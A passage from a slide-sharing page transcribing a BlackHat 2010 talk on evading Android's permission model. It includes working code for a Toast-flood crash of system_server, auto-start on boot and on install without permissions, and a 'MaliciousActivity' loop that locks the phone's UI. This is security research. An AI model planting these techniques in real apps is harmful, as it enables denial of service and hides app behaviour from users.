these aren t the permissions you re looking for
play

THESE ARENT THE PERMISSIONS YOURE LOOKING FOR Anthony Lineberry - PowerPoint PPT Presentation

Apr 20, 2023 •291 likes •1.17k views

THESE ARENT THE PERMISSIONS YOURE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt BlackHat USA 2010 AGENDA Android Internals Overview Security/Permission Model Why Ask For Permission When You Can Ask For

  1. THESE AREN’T THE PERMISSIONS YOU’RE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt BlackHat USA 2010

  2. AGENDA • Android Internals Overview • Security/Permission Model • Why Ask For Permission When You Can Ask For Forgiveness? • Log-Cat – Our Inside Mole • The Ultimate Permission (Yes, we’re talking about root) • Mitigation

  3. ANDROID INTERNALS Diving Into the Belly of the Beast

  4. ANDROID MANIFEST • AndroidManifest.xml – Every application must have one • Declares the package name, a unique identifier for every app • Describes applications components (Activities, Services, BroadcastReceivers, etc) • Declares requested permissions “needed” to access protected API’s (If only there were a way to get around that...) • Declares permissions other applications are required to have to interact with applications components

  5. ACTIVITY • A way for users to interact with the application • Composed of Views: • Button • TextView • ImageView • etc...

  6. ACTIVITY • Managed as an Activity stack • New/foreground activity on top of stack. In running/active state • Previous Activities below in paused state • Removed from stack when Activity finishes

  7. ACTIVITY • An application can start another application’s Activity! • Activity runs in its application’s process. • Callee doesn’t necessarily have access to Activity’s data • Permission attribute in manifest can restrict who can start the permission

  8. INTENT • “An abstract description of an operation to be performed” • Simple IPC for applications • Intents can be sent with data

  9. INTENT • Can be used to start an Activity with startActivity() • Intents can be broadcast system wide with sendBroadcast() • Communicate with a background Service • Two main components: • Action • Data (URI: http:, content:, geo:, etc...) Intent myIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("http://www.google.com")); startActivity(myIntent);

  10. BROADCAST RECEIVER • Receives an Intent • Can be created dynamically with registerBroadcast() or declared in the manifest with the <receiver> tag • Receives two types of broadcasts: • Normal Broadcasts – Asynchronous; Cannot be aborted • Ordered Broadcasts – Delivered serially; Can be aborted or pass result to next receiver

  11. BROADCAST RECEIVER • Permissions can be enforced • Sender can declare permission for who can receive the Intent • Receiver can declare permission for who can send an Intent to it

  12. SERVICE • Component to do work in the background • NOT a separate process • NOT a thread • Kind of like an Activity without a UI • Can enforce access to service with a required permission

  13. SECURITY/PERMISSION MODEL The Mythical Sandbox

  14. THE SANDBOX • Not a VM sandbox as many believe • Unix multi-user (uid/gid) sandbox! • Each app is a different uid • Lightweight VM running for each process • Breaking out of the VM gains you nothing • Apps can request to share a uid (Both must be signed with the same key)

  15. PERMISSIONS • Default application has no permissions granted • Finer grained access to content/APIs • android.permission.READ_SMS • android.permission.CHANGE_WIFI_STATE • etc.. • Declared in AndroidManifest.xml

  16. WHY ASK FOR PERMISSION WHEN YOU CAN ASK FOR FORGIVENESS?

  17. WHY PERMISSIONS MATTER • Permissions gate what an App can do • Users are required to OK permissions before downloading an App • Users can decipher to some degree whether permissions are appropriate

  18. WHY PERMISSIONS MATTER WHY PERMISSIONS MATTER VS

  19. WHAT DOES 0 PERMISSIONS MEAN? • No permission screen at all! • Straight to download • Why should a user worry about an App Android doesn’t warn about?

  20. REBOOT WITH 0 PERMISSIONS <!-- Required to be able to reboot the device. --> <permission android:name="android.permission.REBOOT" android:label="@string/permlab_reboot" android:description="@string/permdesc_reboot" android:protectionLevel="signatureOrSystem" /> • REBOOT permission is not normally grantable to apps. • Requires SystemOrSignature • But that won’t stop us!

  21. REBOOT WITH 0 PERMISSIONS • There are many approaches depending on Android OS Version • The easiest and most reliable we’ve found so far involves Toast notifications

  22. REBOOT WITH 0 PERMISSIONS while (true) { Toast.makeText(getApplicationContext(), "Hello World", Toast.LENGTH_LONG).show(); } • Every time you try to display a Toast it creates a weak JNI reference in system_server

  23. REBOOT WITH 0 PERMISSIONS D/dalvikvm( 59): GREF has increased to 2001 W/dalvikvm( 59): Last 10 entries in JNI global reference table: W/dalvikvm( 59): 1991: 0x44023668 cls=Ljava/lang/ref/WeakReference; (28 bytes) ... W/dalvikvm( 59): 2000: 0x44019818 cls=Ljava/lang/ref/WeakReference; (36 bytes) W/dalvikvm( 59): JNI global reference table summary (2001 entries): W/dalvikvm( 59): 101 of Ljava/lang/Class; 164B (54 unique) W/dalvikvm( 59): 2 of Ldalvik/system/VMRuntime; 12B (1 unique) W/dalvikvm( 59): 1 of Ljava/lang/String; 28B W/dalvikvm( 59): 1571 of Ljava/lang/ref/WeakReference; 28B (1571 unique) ... W/dalvikvm( 59): Memory held directly by tracked refs is 70248 bytes E/dalvikvm( 59): Excessive JNI global references (2001) E/dalvikvm( 59): VM aborting I/DEBUG ( 31): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** I/DEBUG ( 31): Build fingerprint: 'generic/google_sdk/generic/:2.2/FRF42/36942:eng/test-keys' I/DEBUG ( 31): pid: 59, tid: 218 >>> system_server <<< I/DEBUG ( 31): signal 11 (SIGSEGV), fault addr deadd00d I/DEBUG ( 31): r0 00000374 r1 0000000c r2 0000000c r3 deadd00d I/DEBUG ( 31): r4 00000026 r5 80887fc4 r6 fg fe9181 r7 000007d1 I/DEBUG ( 31): r8 4889bb88 r9 42970f40 10 42970f28 fp 002535f8 I/DEBUG ( 31): ip 808881ec sp 4889bad8 lr afd154c5 pc 8083b162 cpsr 20000030 I/DEBUG ( 31): #00 pc 0003b162 /system/lib/libdvm.so • At 2001* global references system_server SIGSEGVs • Exact number depends on hardware and OS version

  24. REBOOT WITH 0 PERMISSIONS • Custom Toasts are also implementable, which can display any view • Including invisible views! while (true) { // Invisible toast Toast t = new Toast(getApplicationContext()); t.setView(new View(getApplicationContext())); t.show(); }

  25. RECEIVE_BOOT_COMPLETE WITH 0 PERMISSIONS • Permission to “automatically start at boot” • Too easy - The permission isn’t checked! <receiver android:name="AppLauncher"> <intent-filter android:priority="1000"> <action android:name="android.intent.action.BOOT_COMPLETED" /> </intent-filter> </receiver> <!-- Oops! <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETE" /> -->

  26. START ON INSTALL WITH 0 PERMISSIONS • Interesting trick to use in conjunction with another attack • No permission exists to allow this functionality • Google Analytics referrer tracking to the rescue! <!-- Used for install referrer tracking --> <receiver android:name="com.google.android.apps.analytics.AnalyticsReceiver" android:exported="true"> <intent-filter> <action android:name="com.android.vending.INSTALL_REFERRER" /> </intent-filter> </receiver>

  27. START ON INSTALL WITH 0 PERMISSIONS <!-- Used for to launch my app --> <receiver android:name="com.nethack.LaunchOnInstallReceiver"> <intent-filter> <action android:name="com.android.vending.INSTALL_REFERRER" /> </intent-filter> </receiver> • Just write your own Receiver • But there are some caveats...

  28. START ON INSTALL WITH 0 PERMISSIONS • Requires referrer included in URL leading to App market://details?id=com.nethack&referrer=utm_source%3Dadmob • Admob %26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame %26utm_campaign%3DMalicious_Campaign • Weblink market://details?id=com.nethack&referrer=autostart • OR Android 2.2 • Always includes referrer info market://details? id=com.nethack&referrer=utm_source=androidmarket&utm_medium=devic e& utm_campaign=filtered&utm_content=GAMES/free&rowindex=34

  29. CIRCLE OF DEATH UI HOSTILE TAKEOVER WITH 0 PERMISSIONS • Launch activity that consumes all KeyPresses public boolean onKeyDown(int keyCode, KeyEvent event) { return true; } • Can’t swallow HOME or long press of HOME • Relaunch when Activity exits • Activity can’t launch itself when destroyed, however

  30. CIRCLE OF DEATH WITH 0 PERMISSIONS • So create a circle of death • When Activity is destroyed, launch a Service. Service relaunches destroyed Activity // MaliciousActivity protected void onDestroy() { super.onDestroy(); startService(new Intent(getApplicationContext(), RestartService.class)); } // RestartService public void onCreate() { super.onCreate(); startActivity(new Intent(getApplicationContext(), MaliciousActivity.class) .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)); }

  31. CIRCLE OF DEATH WITH 0 PERMISSIONS • To remove boot into safe mode (No non-system apps are able to run) and uninstall the malicious application. • Bonus points: Maximize volume and play an obnoxious sound.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

COMP 2718: Permissions: Part 2 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 2 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 2 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline Permissions: Part 2 umask - Set Default Permissions Special Permissions Changing Identities su - Run a New Shell as Another

288 views • 11 slides
Teaching Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Reading/Language

Teaching Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Reading/Language

Teaching Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Reading/Language Arts to Several of the slides used in this presentation All Students were originally created by one or more of the following individuals and are

526 views • 26 slides
Abstract Read Permissions Fractional Permissions without the Fractions Alex Summers ETH Zurich

Abstract Read Permissions Fractional Permissions without the Fractions Alex Summers ETH Zurich

Abstract Read Permissions Fractional Permissions without the Fractions Alex Summers ETH Zurich Joint work with : Stefan Heule, Rustan Leino, Peter Mller ETH Zurich Microsoft Research ETH Zurich Overview Verification of

436 views • 42 slides
All About Apps Well cover... Whats an app? What are app permissions? What do

All About Apps Well cover... Whats an app? What are app permissions? What do

All About Apps Well cover... Whats an app? What are app permissions? What do companies gain by getting your permission? Typical permissions requested by apps How to check up on apps already on your phone App safety

134 views • 11 slides
pNFS Access Permissions Check draft-faibish-nfsv4-pnfs-access-permissions-check-03.txt IETF 78

pNFS Access Permissions Check draft-faibish-nfsv4-pnfs-access-permissions-check-03.txt IETF 78

pNFS Access Permissions Check draft-faibish-nfsv4-pnfs-access-permissions-check-03.txt IETF 78 NFSv4 WG Meeting, July 28, 2010 Sorin Faibish sfaibish@emc.com David Black - EMC Mike Eisler - NetApp Jason Glasgow - Google Problem Statement

376 views • 6 slides
Filesystem Hierarchy and Permissions Linux Prepared by Steven Gordon on 19 April 2017

Filesystem Hierarchy and Permissions Linux Prepared by Steven Gordon on 19 April 2017

Linux Filesystem Hierarchy inodes Permissions Filesystem Hierarchy and Permissions Linux Prepared by Steven Gordon on 19 April 2017 Common/Reports/linux-file-permissions.tex, r1417 1/15 Linux Multiuser and Server Operating System

195 views • 15 slides
COMP 2718: Permissions: Part 1 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 1 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 1 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline Permissions Owners, Group Members, and Everyone Else Read, Writing, and Executing Digression: Number Systems chmod - Change

280 views • 14 slides
An Overview of Speech Technologies Aren Jansen Thanks to

An Overview of Speech Technologies Aren Jansen Thanks to

An Overview of Speech Technologies Aren Jansen Thanks to Brian Kingsbury (IBM) and Hynek Hermansky (JHU) for some of the materials contained in

803 views • 51 slides
Update Consumer Credit timeline 1 st April applied for interim permissions 1 st May FCA

Update Consumer Credit timeline 1 st April applied for interim permissions 1 st May FCA

Consumer Credit Update Consumer Credit timeline 1 st April applied for interim permissions 1 st May FCA will write to firms giving them a 3mth window for full applications Firms will be able to apply to vary their permissions and use

274 views • 8 slides
Many users aren't aware that the last page Does it have any relationship to the of the user

Many users aren't aware that the last page Does it have any relationship to the of the user

Many users aren't aware that the last page Does it have any relationship to the of the user journey is not counted and will business at all always show zero Is that the right metrics to be focusing on in the first place? Just because it can

326 views • 3 slides
Linux File Permissions Engineering Secure Software Last Revised: August 26, 2020 SWEN-331:

Linux File Permissions Engineering Secure Software Last Revised: August 26, 2020 SWEN-331:

Linux File Permissions Engineering Secure Software Last Revised: August 26, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 Review: Principle of Least Privilege Every user, thread, process, module needs permissions to run

459 views • 29 slides
Am I a Fiduciary? For ERISA Plans, Non-ERISA Plans, and Plans That Aren't Sure National Tax

Am I a Fiduciary? For ERISA Plans, Non-ERISA Plans, and Plans That Aren't Sure National Tax

Am I a Fiduciary? For ERISA Plans, Non-ERISA Plans, and Plans That Aren't Sure National Tax Sheltered Annuity Association New Orleans February 26 - March 1, 2009 David W. Powell, Principal, Groom Law Group Washington, D.C. First Question -

423 views • 26 slides
JUDGMENT AND DECISION MAKING IN MILITARY CONTEXTS M ARC C ANELLAS *, K AREN F EIGH , P H D, AND R

JUDGMENT AND DECISION MAKING IN MILITARY CONTEXTS M ARC C ANELLAS *, K AREN F EIGH , P H D, AND R

UNCLASSIFIED Marc Canellas Dec. 6, 2016 MORS Experimental Techniques Special Meeting MATHEMATICAL REPRESENTATIONS OF JUDGMENT AND DECISION MAKING IN MILITARY CONTEXTS M ARC C ANELLAS *, K AREN F EIGH , P H D, AND R ACHEL H AGA C

464 views • 33 slides
CSN11121 System Administration and Forensics Week 3 : Users, Permissions, Processes, and Pipes

CSN11121 System Administration and Forensics Week 3 : Users, Permissions, Processes, and Pipes

CSN11121 System Administration and Forensics Week 3 : Users, Permissions, Processes, and Pipes Week 3 : Users, Permissions, Processes, and Pipes Module Leader: Dr Gordon Russell Lecturers: G. Russell, R.Ludwiniak Aliases: CSN11122 (Distance

644 views • 51 slides
These Aren't the COM Objects You're Looking For November, 2018 Victor Ciura Technical Lead,

These Aren't the COM Objects You're Looking For November, 2018 Victor Ciura Technical Lead,

These Aren't the COM Objects You're Looking For November, 2018 Victor Ciura Technical Lead, Advanced Installer www.advancedinstaller.com Abstract Windows COM is 25 years old. Yet it is relevant today more than ever, because Microsoft has bet

1.32k views • 107 slides
Regions and Permissions for Data Invariants Romain Bardou and Claude March e Septembre 2009

Regions and Permissions for Data Invariants Romain Bardou and Claude March e Septembre 2009

Regions and Permissions for Data Invariants Romain Bardou and Claude March e Septembre 2009 Regions and Permissions for Data Invariants 1 / 1 Motivation preservation of data invariants in pointer programs ownership system of Spec#

301 views • 29 slides
Human-Computer interaction Termin 5: User interface styles and technology MMI/SS06 1 MMI / SS06

Human-Computer interaction Termin 5: User interface styles and technology MMI/SS06 1 MMI / SS06

Human-Computer interaction Termin 5: User interface styles and technology MMI/SS06 1 MMI / SS06 2 Command line interface (CLI) way of expressing instructions to the computer directly (e.g. 438 commands in BSD Unix) commands = chars,

795 views • 61 slides
EXTENDS &amp; SILENT CLASSES IN S ASS 3.2 its like ninjas in your code EXTENDS &amp; SILENT

EXTENDS &amp; SILENT CLASSES IN S ASS 3.2 its like ninjas in your code EXTENDS &amp; SILENT

EXTENDS &amp; SILENT CLASSES IN S ASS 3.2 its like ninjas in your code EXTENDS &amp; SILENT CLASSES IN S ASS 3.2 its like ninjas in your code OOCSS FRAMEWORKS create objects to streamline application? OOCSS FRAMEWORKS attempts to

961 views • 94 slides
Economics in the Time of Trump. 2017 Climbing Wall Summit Loveland, CO Matthew C. Roberts, PhD

Economics in the Time of Trump. 2017 Climbing Wall Summit Loveland, CO Matthew C. Roberts, PhD

Economics in the Time of Trump. 2017 Climbing Wall Summit Loveland, CO Matthew C. Roberts, PhD | www.kernmantlegroup.com 19 May 2017 Who am I? Owner, Kernmantle Group Risk management consulting for Agriculture Associate Professor

632 views • 42 slides
Big Data is now a proper noun Randy Olinger Optum 2016 MSST 5/4/2016 Introduction - Optum

Big Data is now a proper noun Randy Olinger Optum 2016 MSST 5/4/2016 Introduction - Optum

Big Data is now a proper noun Randy Olinger Optum 2016 MSST 5/4/2016 Introduction - Optum Largest (by far) health services company in US, probably the world. Parent company 2015 revenue $157B , Optum $67B. Exploiting the

220 views • 10 slides
CREATING SHARED VALUE How building the right thing can make a dollar by making a difference to

CREATING SHARED VALUE How building the right thing can make a dollar by making a difference to

CREATING SHARED VALUE How building the right thing can make a dollar by making a difference to society DEREK WOOD derek@septa.com.au @woodaries SUSAN J. WOLFE susanjwolfe@oestrategy.com @susanjwolfe PHIL PRESETON

1.83k views • 47 slides
Two kinds of phonology John Goldsmith February 26, 2015 Contents 1 Pure phonology 2 1.1

Two kinds of phonology John Goldsmith February 26, 2015 Contents 1 Pure phonology 2 1.1

Two kinds of phonology John Goldsmith February 26, 2015 Contents 1 Pure phonology 2 1.1 Spanish . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.1 Spanish nasal

445 views • 12 slides
MBT Events Presents: Thomas Campbell Calgary Sept 23 - 25, 2011 www.MBTevents.com

MBT Events Presents: Thomas Campbell Calgary Sept 23 - 25, 2011 www.MBTevents.com

MBT Events Presents: Thomas Campbell Calgary Sept 23 - 25, 2011 www.MBTevents.com www.MyBigTOE.com 1 Friday Sept 22 6.00 to 6.20 Introduction to Thomas Campbell and My Big TOE 6.20 to 7.45 Fundamentals of the Larger Reality (Part

2k views • 143 slides
MBT Events Presents: Thomas Campbell New York City April 30 to May 2, 2010 www.MBTevents.com

MBT Events Presents: Thomas Campbell New York City April 30 to May 2, 2010 www.MBTevents.com

MBT Events Presents: Thomas Campbell New York City April 30 to May 2, 2010 www.MBTevents.com www.MyBigTOE.com 1 My Big TOE New York Workshop April/May 2010 My Big TOE (MBT) Trilogy Presentation Slides are Available at No Cost Video

1.55k views • 119 slides

More recommend